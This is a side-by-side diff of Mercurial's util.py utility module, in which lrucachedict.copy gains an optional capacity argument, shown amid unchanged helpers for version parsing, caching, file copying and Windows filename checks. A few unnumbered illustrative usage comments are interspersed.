965 965 logdataapis=logdataapis)
966 966 return socketproxy(fh, observer)
967 967
968 968 def version():
969 969 """Return version information if available."""
970 970 try:
971 971 from . import __version__
972 972 return __version__.version
973 973 except ImportError:
974 974 return 'unknown'
975 975
976 976 def versiontuple(v=None, n=4):
977 977 """Parses a Mercurial version string into an N-tuple.
978 978
979 979 The version string to be parsed is specified with the ``v`` argument.
980 980 If it isn't defined, the current Mercurial version string will be parsed.
981 981
982 982 ``n`` can be 2, 3, or 4. Here is how some version strings map to
983 983 returned values:
984 984
985 985 >>> v = b'3.6.1+190-df9b73d2d444'
986 986 >>> versiontuple(v, 2)
987 987 (3, 6)
988 988 >>> versiontuple(v, 3)
989 989 (3, 6, 1)
990 990 >>> versiontuple(v, 4)
991 991 (3, 6, 1, '190-df9b73d2d444')
992 992
993 993 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
994 994 (3, 6, 1, '190-df9b73d2d444+20151118')
995 995
996 996 >>> v = b'3.6'
997 997 >>> versiontuple(v, 2)
998 998 (3, 6)
999 999 >>> versiontuple(v, 3)
1000 1000 (3, 6, None)
1001 1001 >>> versiontuple(v, 4)
1002 1002 (3, 6, None, None)
1003 1003
1004 1004 >>> v = b'3.9-rc'
1005 1005 >>> versiontuple(v, 2)
1006 1006 (3, 9)
1007 1007 >>> versiontuple(v, 3)
1008 1008 (3, 9, None)
1009 1009 >>> versiontuple(v, 4)
1010 1010 (3, 9, None, 'rc')
1011 1011
1012 1012 >>> v = b'3.9-rc+2-02a8fea4289b'
1013 1013 >>> versiontuple(v, 2)
1014 1014 (3, 9)
1015 1015 >>> versiontuple(v, 3)
1016 1016 (3, 9, None)
1017 1017 >>> versiontuple(v, 4)
1018 1018 (3, 9, None, 'rc+2-02a8fea4289b')
1019 1019
1020 1020 >>> versiontuple(b'4.6rc0')
1021 1021 (4, 6, None, 'rc0')
1022 1022 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1023 1023 (4, 6, None, 'rc0+12-425d55e54f98')
1024 1024 >>> versiontuple(b'.1.2.3')
1025 1025 (None, None, None, '.1.2.3')
1026 1026 >>> versiontuple(b'12.34..5')
1027 1027 (12, 34, None, '..5')
1028 1028 >>> versiontuple(b'1.2.3.4.5.6')
1029 1029 (1, 2, 3, '.4.5.6')
1030 1030 """
1031 1031 if not v:
1032 1032 v = version()
1033 1033 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1034 1034 if not m:
1035 1035 vparts, extra = '', v
1036 1036 elif m.group(2):
1037 1037 vparts, extra = m.groups()
1038 1038 else:
1039 1039 vparts, extra = m.group(1), None
1040 1040
1041 1041 vints = []
1042 1042 for i in vparts.split('.'):
1043 1043 try:
1044 1044 vints.append(int(i))
1045 1045 except ValueError:
1046 1046 break
1047 1047 # (3, 6) -> (3, 6, None)
1048 1048 while len(vints) < 3:
1049 1049 vints.append(None)
1050 1050
1051 1051 if n == 2:
1052 1052 return (vints[0], vints[1])
1053 1053 if n == 3:
1054 1054 return (vints[0], vints[1], vints[2])
1055 1055 if n == 4:
1056 1056 return (vints[0], vints[1], vints[2], extra)
1057 1057
1058 1058 def cachefunc(func):
1059 1059 '''cache the result of function calls'''
1060 1060 # XXX doesn't handle keyword args
1061 1061 if func.__code__.co_argcount == 0:
1062 1062 cache = []
1063 1063 def f():
1064 1064 if len(cache) == 0:
1065 1065 cache.append(func())
1066 1066 return cache[0]
1067 1067 return f
1068 1068 cache = {}
1069 1069 if func.__code__.co_argcount == 1:
1070 1070 # we gain a small amount of time because
1071 1071 # we don't need to pack/unpack the list
1072 1072 def f(arg):
1073 1073 if arg not in cache:
1074 1074 cache[arg] = func(arg)
1075 1075 return cache[arg]
1076 1076 else:
1077 1077 def f(*args):
1078 1078 if args not in cache:
1079 1079 cache[args] = func(*args)
1080 1080 return cache[args]
1081 1081
1082 1082 return f
1083 1083
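# Illustrative sketch (editor's addition): cachefunc memoizes on positional
# arguments with no eviction, so it suits pure functions whose distinct
# argument values are bounded:
#
#     @cachefunc
#     def fib(n):
#         return n if n < 2 else fib(n - 1) + fib(n - 2)
#
#     fib(30)   # each distinct n is computed only once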
1084 1084 class cow(object):
1085 1085 """helper class to make copy-on-write easier
1086 1086
1087 1087 Call preparewrite before doing any writes.
1088 1088 """
1089 1089
1090 1090 def preparewrite(self):
1091 1091 """call this before writes, return self or a copied new object"""
1092 1092 if getattr(self, '_copied', 0):
1093 1093 self._copied -= 1
1094 1094 return self.__class__(self)
1095 1095 return self
1096 1096
1097 1097 def copy(self):
1098 1098 """always do a cheap copy"""
1099 1099 self._copied = getattr(self, '_copied', 0) + 1
1100 1100 return self
1101 1101
1102 1102 class sortdict(collections.OrderedDict):
1103 1103 '''a simple sorted dictionary
1104 1104
1105 1105 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1106 1106 >>> d2 = d1.copy()
1107 1107 >>> d2
1108 1108 sortdict([('a', 0), ('b', 1)])
1109 1109 >>> d2.update([(b'a', 2)])
1110 1110 >>> list(d2.keys()) # should still be in last-set order
1111 1111 ['b', 'a']
1112 1112 '''
1113 1113
1114 1114 def __setitem__(self, key, value):
1115 1115 if key in self:
1116 1116 del self[key]
1117 1117 super(sortdict, self).__setitem__(key, value)
1118 1118
1119 1119 if pycompat.ispypy:
1120 1120 # __setitem__() isn't called as of PyPy 5.8.0
1121 1121 def update(self, src):
1122 1122 if isinstance(src, dict):
1123 1123 src = src.iteritems()
1124 1124 for k, v in src:
1125 1125 self[k] = v
1126 1126
1127 1127 class cowdict(cow, dict):
1128 1128 """copy-on-write dict
1129 1129
1130 1130 Be sure to call d = d.preparewrite() before writing to d.
1131 1131
1132 1132 >>> a = cowdict()
1133 1133 >>> a is a.preparewrite()
1134 1134 True
1135 1135 >>> b = a.copy()
1136 1136 >>> b is a
1137 1137 True
1138 1138 >>> c = b.copy()
1139 1139 >>> c is a
1140 1140 True
1141 1141 >>> a = a.preparewrite()
1142 1142 >>> b is a
1143 1143 False
1144 1144 >>> a is a.preparewrite()
1145 1145 True
1146 1146 >>> c = c.preparewrite()
1147 1147 >>> b is c
1148 1148 False
1149 1149 >>> b is b.preparewrite()
1150 1150 True
1151 1151 """
1152 1152
1153 1153 class cowsortdict(cow, sortdict):
1154 1154 """copy-on-write sortdict
1155 1155
1156 1156 Be sure to call d = d.preparewrite() before writing to d.
1157 1157 """
1158 1158
1159 1159 class transactional(object):
1160 1160 """Base class for making a transactional type into a context manager."""
1161 1161 __metaclass__ = abc.ABCMeta
1162 1162
1163 1163 @abc.abstractmethod
1164 1164 def close(self):
1165 1165 """Successfully closes the transaction."""
1166 1166
1167 1167 @abc.abstractmethod
1168 1168 def release(self):
1169 1169 """Marks the end of the transaction.
1170 1170
1171 1171 If the transaction has not been closed, it will be aborted.
1172 1172 """
1173 1173
1174 1174 def __enter__(self):
1175 1175 return self
1176 1176
1177 1177 def __exit__(self, exc_type, exc_val, exc_tb):
1178 1178 try:
1179 1179 if exc_type is None:
1180 1180 self.close()
1181 1181 finally:
1182 1182 self.release()
1183 1183
1184 1184 @contextlib.contextmanager
1185 1185 def acceptintervention(tr=None):
1186 1186 """A context manager that closes the transaction on InterventionRequired
1187 1187
1188 1188 If no transaction was provided, this simply runs the body and returns
1189 1189 """
1190 1190 if not tr:
1191 1191 yield
1192 1192 return
1193 1193 try:
1194 1194 yield
1195 1195 tr.close()
1196 1196 except error.InterventionRequired:
1197 1197 tr.close()
1198 1198 raise
1199 1199 finally:
1200 1200 tr.release()
1201 1201
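# Illustrative sketch (editor's addition): acceptintervention closes (commits)
# the transaction even when InterventionRequired propagates, because that
# error means "stop and ask the user", not "roll back the work done so far":
#
#     with acceptintervention(tr):
#         applychanges(tr)   # hypothetical helper; tr is an open transaction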
1202 1202 @contextlib.contextmanager
1203 1203 def nullcontextmanager():
1204 1204 yield
1205 1205
1206 1206 class _lrucachenode(object):
1207 1207 """A node in a doubly linked list.
1208 1208
1209 1209 Holds a reference to nodes on either side as well as a key-value
1210 1210 pair for the dictionary entry.
1211 1211 """
1212 1212 __slots__ = (u'next', u'prev', u'key', u'value')
1213 1213
1214 1214 def __init__(self):
1215 1215 self.next = None
1216 1216 self.prev = None
1217 1217
1218 1218 self.key = _notset
1219 1219 self.value = None
1220 1220
1221 1221 def markempty(self):
1222 1222 """Mark the node as emptied."""
1223 1223 self.key = _notset
1224 1224
1225 1225 class lrucachedict(object):
1226 1226 """Dict that caches most recent accesses and sets.
1227 1227
1228 1228 The dict consists of an actual backing dict - indexed by original
1229 1229 key - and a doubly linked circular list defining the order of entries in
1230 1230 the cache.
1231 1231
1232 1232 The head node is the newest entry in the cache. If the cache is full,
1233 1233 we recycle head.prev and make it the new head. Cache accesses result in
1234 1234 the node being moved to before the existing head and being marked as the
1235 1235 new head node.
1236 1236 """
1237 1237 def __init__(self, max):
1238 1238 self._cache = {}
1239 1239
1240 1240 self._head = head = _lrucachenode()
1241 1241 head.prev = head
1242 1242 head.next = head
1243 1243 self._size = 1
1244 1244 self.capacity = max
1245 1245
1246 1246 def __len__(self):
1247 1247 return len(self._cache)
1248 1248
1249 1249 def __contains__(self, k):
1250 1250 return k in self._cache
1251 1251
1252 1252 def __iter__(self):
1253 1253 # We don't have to iterate in cache order, but why not.
1254 1254 n = self._head
1255 1255 for i in range(len(self._cache)):
1256 1256 yield n.key
1257 1257 n = n.next
1258 1258
1259 1259 def __getitem__(self, k):
1260 1260 node = self._cache[k]
1261 1261 self._movetohead(node)
1262 1262 return node.value
1263 1263
1264 1264 def __setitem__(self, k, v):
1265 1265 node = self._cache.get(k)
1266 1266 # Replace existing value and mark as newest.
1267 1267 if node is not None:
1268 1268 node.value = v
1269 1269 self._movetohead(node)
1270 1270 return
1271 1271
1272 1272 if self._size < self.capacity:
1273 1273 node = self._addcapacity()
1274 1274 else:
1275 1275 # Grab the last/oldest item.
1276 1276 node = self._head.prev
1277 1277
1278 1278 # At capacity. Kill the old entry.
1279 1279 if node.key is not _notset:
1280 1280 del self._cache[node.key]
1281 1281
1282 1282 node.key = k
1283 1283 node.value = v
1284 1284 self._cache[k] = node
1285 1285 # And mark it as newest entry. No need to adjust order since it
1286 1286 # is already self._head.prev.
1287 1287 self._head = node
1288 1288
1289 1289 def __delitem__(self, k):
1290 1290 node = self._cache.pop(k)
1291 1291 node.markempty()
1292 1292
1293 1293 # Temporarily mark as newest item before re-adjusting head to make
1294 1294 # this node the oldest item.
1295 1295 self._movetohead(node)
1296 1296 self._head = node.next
1297 1297
1298 1298 # Additional dict methods.
1299 1299
1300 1300 def get(self, k, default=None):
1301 1301 try:
1302 1302 return self._cache[k].value
1303 1303 except KeyError:
1304 1304 return default
1305 1305
1306 1306 def clear(self):
1307 1307 n = self._head
1308 1308 while n.key is not _notset:
1309 1309 n.markempty()
1310 1310 n = n.next
1311 1311
1312 1312 self._cache.clear()
1313 1313
1314 def copy(self):
1315 result = lrucachedict(self.capacity)
1314 def copy(self, capacity=None):
1315 """Create a new cache as a copy of the current one.
1316
1317 By default, the new cache has the same capacity as the existing one.
1318 But, the cache capacity can be changed as part of performing the
1319 copy.
1320
1321 Items in the copy have an insertion/access order matching this
1322 instance.
1323 """
1324
1325 capacity = capacity or self.capacity
1326 result = lrucachedict(capacity)
1316 1327
1317 1328 # We copy entries by iterating in oldest-to-newest order so the copy
1318 1329 # has the correct ordering.
1319 1330
1320 1331 # Find the first non-empty entry.
1321 1332 n = self._head.prev
1322 1333 while n.key is _notset and n is not self._head:
1323 1334 n = n.prev
1324 1335
1336 # We could potentially skip the first N items when decreasing capacity.
1337 # But let's keep it simple unless it is a performance problem.
1325 1338 for i in range(len(self._cache)):
1326 1339 result[n.key] = n.value
1327 1340 n = n.prev
1328 1341
1329 1342 return result
1330 1343
1331 1344 def _movetohead(self, node):
1332 1345 """Mark a node as the newest, making it the new head.
1333 1346
1334 1347 When a node is accessed, it becomes the freshest entry in the LRU
1335 1348 list, which is denoted by self._head.
1336 1349
1337 1350 Visually, let's make ``N`` the new head node (* denotes head):
1338 1351
1339 1352 previous/oldest <-> head <-> next/next newest
1340 1353
1341 1354 ----<->--- A* ---<->-----
1342 1355 | |
1343 1356 E <-> D <-> N <-> C <-> B
1344 1357
1345 1358 To:
1346 1359
1347 1360 ----<->--- N* ---<->-----
1348 1361 | |
1349 1362 E <-> D <-> C <-> B <-> A
1350 1363
1351 1364 This requires the following moves:
1352 1365
1353 1366 C.next = D (node.prev.next = node.next)
1354 1367 D.prev = C (node.next.prev = node.prev)
1355 1368 E.next = N (head.prev.next = node)
1356 1369 N.prev = E (node.prev = head.prev)
1357 1370 N.next = A (node.next = head)
1358 1371 A.prev = N (head.prev = node)
1359 1372 """
1360 1373 head = self._head
1361 1374 # C.next = D
1362 1375 node.prev.next = node.next
1363 1376 # D.prev = C
1364 1377 node.next.prev = node.prev
1365 1378 # N.prev = E
1366 1379 node.prev = head.prev
1367 1380 # N.next = A
1368 1381 # It is tempting to do just "head" here, however if node is
1369 1382 # adjacent to head, that would corrupt the linked list.
1370 1383 node.next = head.prev.next
1371 1384 # E.next = N
1372 1385 node.next.prev = node
1373 1386 # A.prev = N
1374 1387 node.prev.next = node
1375 1388
1376 1389 self._head = node
1377 1390
1378 1391 def _addcapacity(self):
1379 1392 """Add a node to the circular linked list.
1380 1393
1381 1394 The new node is inserted before the head node.
1382 1395 """
1383 1396 head = self._head
1384 1397 node = _lrucachenode()
1385 1398 head.prev.next = node
1386 1399 node.prev = head.prev
1387 1400 node.next = head
1388 1401 head.prev = node
1389 1402 self._size += 1
1390 1403 return node
1391 1404
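# Illustrative sketch (editor's addition): lrucachedict access refreshes an
# entry, and insertion at capacity evicts the least recently used one:
#
#     d = lrucachedict(2)
#     d['a'] = 0
#     d['b'] = 1
#     d['a']       # access marks 'a' as the most recently used entry
#     d['c'] = 2   # at capacity: evicts 'b', the least recently used
#     sorted(d)    # -> ['a', 'c']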
1392 1405 def lrucachefunc(func):
1393 1406 '''cache most recent results of function calls'''
1394 1407 cache = {}
1395 1408 order = collections.deque()
1396 1409 if func.__code__.co_argcount == 1:
1397 1410 def f(arg):
1398 1411 if arg not in cache:
1399 1412 if len(cache) > 20:
1400 1413 del cache[order.popleft()]
1401 1414 cache[arg] = func(arg)
1402 1415 else:
1403 1416 order.remove(arg)
1404 1417 order.append(arg)
1405 1418 return cache[arg]
1406 1419 else:
1407 1420 def f(*args):
1408 1421 if args not in cache:
1409 1422 if len(cache) > 20:
1410 1423 del cache[order.popleft()]
1411 1424 cache[args] = func(*args)
1412 1425 else:
1413 1426 order.remove(args)
1414 1427 order.append(args)
1415 1428 return cache[args]
1416 1429
1417 1430 return f
1418 1431
1419 1432 class propertycache(object):
1420 1433 def __init__(self, func):
1421 1434 self.func = func
1422 1435 self.name = func.__name__
1423 1436 def __get__(self, obj, type=None):
1424 1437 result = self.func(obj)
1425 1438 self.cachevalue(obj, result)
1426 1439 return result
1427 1440
1428 1441 def cachevalue(self, obj, value):
1429 1442 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1430 1443 obj.__dict__[self.name] = value
1431 1444
1432 1445 def clearcachedproperty(obj, prop):
1433 1446 '''clear a cached property value, if one has been set'''
1434 1447 if prop in obj.__dict__:
1435 1448 del obj.__dict__[prop]
1436 1449
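# Illustrative sketch (editor's addition): propertycache computes a value on
# first access and stores it in the instance __dict__, which then shadows the
# descriptor; clearcachedproperty forces recomputation:
#
#     class repoinfo(object):
#         @propertycache
#         def expensive(self):
#             return computevalue()   # hypothetical costly call
#
#     r = repoinfo()
#     r.expensive                          # computed once, then cached
#     clearcachedproperty(r, 'expensive')  # next access recomputes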
1437 1450 def increasingchunks(source, min=1024, max=65536):
1438 1451 '''return no less than min bytes per chunk while data remains,
1439 1452 doubling min after each chunk until it reaches max'''
1440 1453 def log2(x):
1441 1454 if not x:
1442 1455 return 0
1443 1456 i = 0
1444 1457 while x:
1445 1458 x >>= 1
1446 1459 i += 1
1447 1460 return i - 1
1448 1461
1449 1462 buf = []
1450 1463 blen = 0
1451 1464 for chunk in source:
1452 1465 buf.append(chunk)
1453 1466 blen += len(chunk)
1454 1467 if blen >= min:
1455 1468 if min < max:
1456 1469 min = min << 1
1457 1470 nmin = 1 << log2(blen)
1458 1471 if nmin > min:
1459 1472 min = nmin
1460 1473 if min > max:
1461 1474 min = max
1462 1475 yield ''.join(buf)
1463 1476 blen = 0
1464 1477 buf = []
1465 1478 if buf:
1466 1479 yield ''.join(buf)
1467 1480
1468 1481 def always(fn):
1469 1482 return True
1470 1483
1471 1484 def never(fn):
1472 1485 return False
1473 1486
1474 1487 def nogc(func):
1475 1488 """disable garbage collector
1476 1489
1477 1490 Python's garbage collector triggers a GC each time a certain number of
1478 1491 container objects (the number being defined by gc.get_threshold()) are
1479 1492 allocated even when marked not to be tracked by the collector. Tracking has
1480 1493 no effect on when GCs are triggered, only on what objects the GC looks
1481 1494 into. As a workaround, disable GC while building complex (huge)
1482 1495 containers.
1483 1496
1484 1497 This garbage collector issue has been fixed in 2.7, but it still affects
1485 1498 CPython's performance.
1486 1499 """
1487 1500 def wrapper(*args, **kwargs):
1488 1501 gcenabled = gc.isenabled()
1489 1502 gc.disable()
1490 1503 try:
1491 1504 return func(*args, **kwargs)
1492 1505 finally:
1493 1506 if gcenabled:
1494 1507 gc.enable()
1495 1508 return wrapper
1496 1509
1497 1510 if pycompat.ispypy:
1498 1511 # PyPy runs slower with gc disabled
1499 1512 nogc = lambda x: x
1500 1513
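# Illustrative sketch (editor's addition): use nogc around code that builds a
# large container, so the cyclic GC does not fire repeatedly mid-build:
#
#     @nogc
#     def buildmap(items):
#         return dict((k, [k] * 4) for k in items)   # many allocations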
1501 1514 def pathto(root, n1, n2):
1502 1515 '''return the relative path from one place to another.
1503 1516 root should use os.sep to separate directories
1504 1517 n1 should use os.sep to separate directories
1505 1518 n2 should use "/" to separate directories
1506 1519 returns an os.sep-separated path.
1507 1520
1508 1521 If n1 is a relative path, it's assumed it's
1509 1522 relative to root.
1510 1523 n2 should always be relative to root.
1511 1524 '''
1512 1525 if not n1:
1513 1526 return localpath(n2)
1514 1527 if os.path.isabs(n1):
1515 1528 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1516 1529 return os.path.join(root, localpath(n2))
1517 1530 n2 = '/'.join((pconvert(root), n2))
1518 1531 a, b = splitpath(n1), n2.split('/')
1519 1532 a.reverse()
1520 1533 b.reverse()
1521 1534 while a and b and a[-1] == b[-1]:
1522 1535 a.pop()
1523 1536 b.pop()
1524 1537 b.reverse()
1525 1538 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1526 1539
1527 1540 # the location of data files matching the source code
1528 1541 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1529 1542 # executable version (py2exe) doesn't support __file__
1530 1543 datapath = os.path.dirname(pycompat.sysexecutable)
1531 1544 else:
1532 1545 datapath = os.path.dirname(pycompat.fsencode(__file__))
1533 1546
1534 1547 i18n.setdatapath(datapath)
1535 1548
1536 1549 def checksignature(func):
1537 1550 '''wrap a function with code to check for calling errors'''
1538 1551 def check(*args, **kwargs):
1539 1552 try:
1540 1553 return func(*args, **kwargs)
1541 1554 except TypeError:
1542 1555 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1543 1556 raise error.SignatureError
1544 1557 raise
1545 1558
1546 1559 return check
1547 1560
1548 1561 # a whitelist of known filesystems where hardlinks work reliably
1549 1562 _hardlinkfswhitelist = {
1550 1563 'apfs',
1551 1564 'btrfs',
1552 1565 'ext2',
1553 1566 'ext3',
1554 1567 'ext4',
1555 1568 'hfs',
1556 1569 'jfs',
1557 1570 'NTFS',
1558 1571 'reiserfs',
1559 1572 'tmpfs',
1560 1573 'ufs',
1561 1574 'xfs',
1562 1575 'zfs',
1563 1576 }
1564 1577
1565 1578 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1566 1579 '''copy a file, preserving mode and optionally other stat info like
1567 1580 atime/mtime
1568 1581
1569 1582 checkambig argument is used with filestat, and is useful only if
1570 1583 destination file is guarded by any lock (e.g. repo.lock or
1571 1584 repo.wlock).
1572 1585
1573 1586 copystat and checkambig should be exclusive.
1574 1587 '''
1575 1588 assert not (copystat and checkambig)
1576 1589 oldstat = None
1577 1590 if os.path.lexists(dest):
1578 1591 if checkambig:
1579 1592 oldstat = checkambig and filestat.frompath(dest)
1580 1593 unlink(dest)
1581 1594 if hardlink:
1582 1595 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1583 1596 # unless we are confident that dest is on a whitelisted filesystem.
1584 1597 try:
1585 1598 fstype = getfstype(os.path.dirname(dest))
1586 1599 except OSError:
1587 1600 fstype = None
1588 1601 if fstype not in _hardlinkfswhitelist:
1589 1602 hardlink = False
1590 1603 if hardlink:
1591 1604 try:
1592 1605 oslink(src, dest)
1593 1606 return
1594 1607 except (IOError, OSError):
1595 1608 pass # fall back to normal copy
1596 1609 if os.path.islink(src):
1597 1610 os.symlink(os.readlink(src), dest)
1598 1611 # copytime is ignored for symlinks, but in general copytime isn't needed
1599 1612 # for them anyway
1600 1613 else:
1601 1614 try:
1602 1615 shutil.copyfile(src, dest)
1603 1616 if copystat:
1604 1617 # copystat also copies mode
1605 1618 shutil.copystat(src, dest)
1606 1619 else:
1607 1620 shutil.copymode(src, dest)
1608 1621 if oldstat and oldstat.stat:
1609 1622 newstat = filestat.frompath(dest)
1610 1623 if newstat.isambig(oldstat):
1611 1624 # stat of copied file is ambiguous to original one
1612 1625 advanced = (
1613 1626 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1614 1627 os.utime(dest, (advanced, advanced))
1615 1628 except shutil.Error as inst:
1616 1629 raise error.Abort(str(inst))
1617 1630
1618 1631 def copyfiles(src, dst, hardlink=None, progress=None):
1619 1632 """Copy a directory tree using hardlinks if possible."""
1620 1633 num = 0
1621 1634
1622 1635 def settopic():
1623 1636 if progress:
1624 1637 progress.topic = _('linking') if hardlink else _('copying')
1625 1638
1626 1639 if os.path.isdir(src):
1627 1640 if hardlink is None:
1628 1641 hardlink = (os.stat(src).st_dev ==
1629 1642 os.stat(os.path.dirname(dst)).st_dev)
1630 1643 settopic()
1631 1644 os.mkdir(dst)
1632 1645 for name, kind in listdir(src):
1633 1646 srcname = os.path.join(src, name)
1634 1647 dstname = os.path.join(dst, name)
1635 1648 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1636 1649 num += n
1637 1650 else:
1638 1651 if hardlink is None:
1639 1652 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1640 1653 os.stat(os.path.dirname(dst)).st_dev)
1641 1654 settopic()
1642 1655
1643 1656 if hardlink:
1644 1657 try:
1645 1658 oslink(src, dst)
1646 1659 except (IOError, OSError):
1647 1660 hardlink = False
1648 1661 shutil.copy(src, dst)
1649 1662 else:
1650 1663 shutil.copy(src, dst)
1651 1664 num += 1
1652 1665 if progress:
1653 1666 progress.increment()
1654 1667
1655 1668 return hardlink, num
1656 1669
1657 1670 _winreservednames = {
1658 1671 'con', 'prn', 'aux', 'nul',
1659 1672 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1660 1673 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1661 1674 }
1662 1675 _winreservedchars = ':*?"<>|'
1663 1676 def checkwinfilename(path):
1664 1677 r'''Check that the base-relative path is a valid filename on Windows.
1665 1678 Returns None if the path is ok, or a UI string describing the problem.
1666 1679
1667 1680 >>> checkwinfilename(b"just/a/normal/path")
1668 1681 >>> checkwinfilename(b"foo/bar/con.xml")
1669 1682 "filename contains 'con', which is reserved on Windows"
1670 1683 >>> checkwinfilename(b"foo/con.xml/bar")
1671 1684 "filename contains 'con', which is reserved on Windows"
1672 1685 >>> checkwinfilename(b"foo/bar/xml.con")
1673 1686 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1674 1687 "filename contains 'AUX', which is reserved on Windows"
1675 1688 >>> checkwinfilename(b"foo/bar/bla:.txt")
1676 1689 "filename contains ':', which is reserved on Windows"
1677 1690 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1678 1691 "filename contains '\\x07', which is invalid on Windows"
1679 1692 >>> checkwinfilename(b"foo/bar/bla ")
1680 1693 "filename ends with ' ', which is not allowed on Windows"
1681 1694 >>> checkwinfilename(b"../bar")
1682 1695 >>> checkwinfilename(b"foo\\")
1683 1696 "filename ends with '\\', which is invalid on Windows"
1684 1697 >>> checkwinfilename(b"foo\\/bar")
1685 1698 "directory name ends with '\\', which is invalid on Windows"
1686 1699 '''
1687 1700 if path.endswith('\\'):
1688 1701 return _("filename ends with '\\', which is invalid on Windows")
1689 1702 if '\\/' in path:
1690 1703 return _("directory name ends with '\\', which is invalid on Windows")
1691 1704 for n in path.replace('\\', '/').split('/'):
1692 1705 if not n:
1693 1706 continue
1694 1707 for c in _filenamebytestr(n):
1695 1708 if c in _winreservedchars:
1696 1709 return _("filename contains '%s', which is reserved "
1697 1710 "on Windows") % c
1698 1711 if ord(c) <= 31:
1699 1712 return _("filename contains '%s', which is invalid "
1700 1713 "on Windows") % stringutil.escapestr(c)
1701 1714 base = n.split('.')[0]
1702 1715 if base and base.lower() in _winreservednames:
1703 1716 return _("filename contains '%s', which is reserved "
1704 1717 "on Windows") % base
1705 1718 t = n[-1:]
1706 1719 if t in '. ' and n not in '..':
1707 1720 return _("filename ends with '%s', which is not allowed "
1708 1721 "on Windows") % t
1709 1722
1710 1723 if pycompat.iswindows:
1711 1724 checkosfilename = checkwinfilename
1712 1725 timer = time.clock
1713 1726 else:
1714 1727 checkosfilename = platform.checkosfilename
1715 1728 timer = time.time
1716 1729
1717 1730 if safehasattr(time, "perf_counter"):
1718 1731 timer = time.perf_counter
1719 1732
1720 1733 def makelock(info, pathname):
1721 1734 """Create a lock file atomically if possible
1722 1735
1723 1736 This may leave a stale lock file if symlink isn't supported and signal
1724 1737 interrupt is enabled.
1725 1738 """
1726 1739 try:
1727 1740 return os.symlink(info, pathname)
1728 1741 except OSError as why:
1729 1742 if why.errno == errno.EEXIST:
1730 1743 raise
1731 1744 except AttributeError: # no symlink in os
1732 1745 pass
1733 1746
1734 1747 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1735 1748 ld = os.open(pathname, flags)
1736 1749 os.write(ld, info)
1737 1750 os.close(ld)
1738 1751
1739 1752 def readlock(pathname):
1740 1753 try:
1741 1754 return os.readlink(pathname)
1742 1755 except OSError as why:
1743 1756 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1744 1757 raise
1745 1758 except AttributeError: # no symlink in os
1746 1759 pass
1747 1760 fp = posixfile(pathname, 'rb')
1748 1761 r = fp.read()
1749 1762 fp.close()
1750 1763 return r
1751 1764
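# Editorial sketch: makelock() and readlock() round-trip lock metadata whether
# the platform stores it in a symlink target or in a small regular file. The
# helper below is hypothetical and not part of Mercurial's API; it assumes the
# usual bytes-everywhere calling convention of this module.
def _demolockroundtrip(lockpath):
    makelock(b'somehost:12345', lockpath)
    try:
        return readlock(lockpath)  # -> b'somehost:12345'
    finally:
        os.unlink(lockpath)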
1752 1765 def fstat(fp):
1753 1766 '''stat file object that may not have fileno method.'''
1754 1767 try:
1755 1768 return os.fstat(fp.fileno())
1756 1769 except AttributeError:
1757 1770 return os.stat(fp.name)
1758 1771
1759 1772 # File system features
1760 1773
1761 1774 def fscasesensitive(path):
1762 1775 """
1763 1776 Return true if the given path is on a case-sensitive filesystem
1764 1777
1765 1778 Requires a path (like /foo/.hg) ending with a foldable final
1766 1779 directory component.
1767 1780 """
1768 1781 s1 = os.lstat(path)
1769 1782 d, b = os.path.split(path)
1770 1783 b2 = b.upper()
1771 1784 if b == b2:
1772 1785 b2 = b.lower()
1773 1786 if b == b2:
1774 1787 return True # no evidence against case sensitivity
1775 1788 p2 = os.path.join(d, b2)
1776 1789 try:
1777 1790 s2 = os.lstat(p2)
1778 1791 if s2 == s1:
1779 1792 return False
1780 1793 return True
1781 1794 except OSError:
1782 1795 return True
1783 1796
1784 1797 try:
1785 1798 import re2
1786 1799 _re2 = None
1787 1800 except ImportError:
1788 1801 _re2 = False
1789 1802
1790 1803 class _re(object):
1791 1804 def _checkre2(self):
1792 1805 global _re2
1793 1806 try:
1794 1807 # check if match works, see issue3964
1795 1808 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1796 1809 except ImportError:
1797 1810 _re2 = False
1798 1811
1799 1812 def compile(self, pat, flags=0):
1800 1813 '''Compile a regular expression, using re2 if possible
1801 1814
1802 1815 For best performance, use only re2-compatible regexp features. The
1803 1816 only flags from the re module that are re2-compatible are
1804 1817 IGNORECASE and MULTILINE.'''
1805 1818 if _re2 is None:
1806 1819 self._checkre2()
1807 1820 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1808 1821 if flags & remod.IGNORECASE:
1809 1822 pat = '(?i)' + pat
1810 1823 if flags & remod.MULTILINE:
1811 1824 pat = '(?m)' + pat
1812 1825 try:
1813 1826 return re2.compile(pat)
1814 1827 except re2.error:
1815 1828 pass
1816 1829 return remod.compile(pat, flags)
1817 1830
1818 1831 @propertycache
1819 1832 def escape(self):
1820 1833 '''Return the version of escape corresponding to self.compile.
1821 1834
1822 1835 This is imperfect because whether re2 or re is used for a particular
1823 1836 function depends on the flags, etc, but it's the best we can do.
1824 1837 '''
1825 1838 global _re2
1826 1839 if _re2 is None:
1827 1840 self._checkre2()
1828 1841 if _re2:
1829 1842 return re2.escape
1830 1843 else:
1831 1844 return remod.escape
1832 1845
1833 1846 re = _re()
1834 1847
